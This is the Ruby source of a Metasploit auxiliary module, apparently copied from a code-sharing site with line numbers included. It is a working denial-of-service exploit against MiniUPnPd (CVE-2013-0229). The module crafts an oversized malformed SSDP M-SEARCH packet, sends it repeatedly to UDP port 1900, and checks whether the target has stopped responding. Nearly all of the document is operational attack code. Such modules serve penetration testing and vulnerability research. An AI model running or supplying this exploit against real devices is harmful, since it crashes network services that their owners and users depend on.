Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'MiniUPnPd 1.4 Denial of Service (DoS) Exploit',
13
      'Description'    => %q{
14
          This module allows remote attackers to cause a denial of service (DoS)
15
          in MiniUPnP 1.0 server via a specifically crafted UDP request.
16
      },
17
      'Author'         =>
18
        [
19
          'hdm', # Vulnerability discovery
20
          'Dejan Lukan' # Metasploit module
21
        ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'CVE', '2013-0229' ],
26
          [ 'OSVDB', '89625' ],
27
          [ 'BID', '57607' ],
28
          [ 'URL', 'https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/' ],
29
          [ 'URL', 'https://www.hdm.io/writing/SecurityFlawsUPnP.pdf' ]
30
        ],
31
      'DisclosureDate' => '2013-03-27',
32
    ))
33

34
    register_options(
35
    [
36
      Opt::RPORT(1900),
37
      OptInt.new('ATTEMPTS', [true, 'Max number of attempts to DoS the remote MiniUPnP ending', 3 ])
38
    ])
39
  end
40

41
  def send_probe(udp_sock, probe)
42
    udp_sock.put(probe)
43
    data = udp_sock.recvfrom
44
    if data and not data[0].empty?
45
      return data[0]
46
    else
47
      return nil
48
    end
49
  end
50

51
  def run
52
    # the M-SEARCH probe packet that tries to identify whether the service is up or not
53
    msearch_probe = "M-SEARCH * HTTP/1.1\r\n"
54
    msearch_probe << "Host:239.255.255.250:1900\r\n"
55
    msearch_probe << "ST:upnp:rootdevice\r\n"
56
    msearch_probe << "Man:\"ssdp:discover\"\r\n"
57
    msearch_probe << "MX:3\r\n"
58
    msearch_probe << "\r\n"
59

60
    # the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
61
    # ST line
62
    sploit = "M-SEARCH * HTTP/1.1\r\n"
63
    sploit << "HOST: 239.255.255.250:1900\r\n"
64
    sploit << "ST:uuid:schemas:device:MX:3"
65
    # the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
66
    # this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
67
    # characters: there's more chance that the program will run off the stack.
68
    sploit += ' '*(1500-sploit.length)
69

70

71
    # connect to the UDP port
72
    connect_udp
73

74
    print_status("#{rhost}:#{rport} - Checking UPnP...")
75
    response = send_probe(udp_sock, msearch_probe)
76
    if response.nil?
77
      print_error("#{rhost}:#{rport} - UPnP end not found")
78
      disconnect_udp
79
      return
80
    end
81

82
    (1..datastore['ATTEMPTS']).each { |attempt|
83
      print_status("#{rhost}:#{rport} - UPnP DoS attempt #{attempt}...")
84

85
      # send the exploit to the target
86
      print_status("#{rhost}:#{rport} - Sending malformed packet...")
87
      udp_sock.put(sploit)
88

89
      # send the probe to the target
90
      print_status("#{rhost}:#{rport} - The target should be unresponsive now...")
91
      response = send_probe(udp_sock, msearch_probe)
92
      if response.nil?
93
        print_good("#{rhost}:#{rport} - UPnP unresponsive")
94
        disconnect_udp
95
        return
96
      else
97
        print_status("#{rhost}:#{rport} - UPnP is responsive still")
98
      end
99
    }
100

101
    disconnect_udp
102
  end
103
end
104

105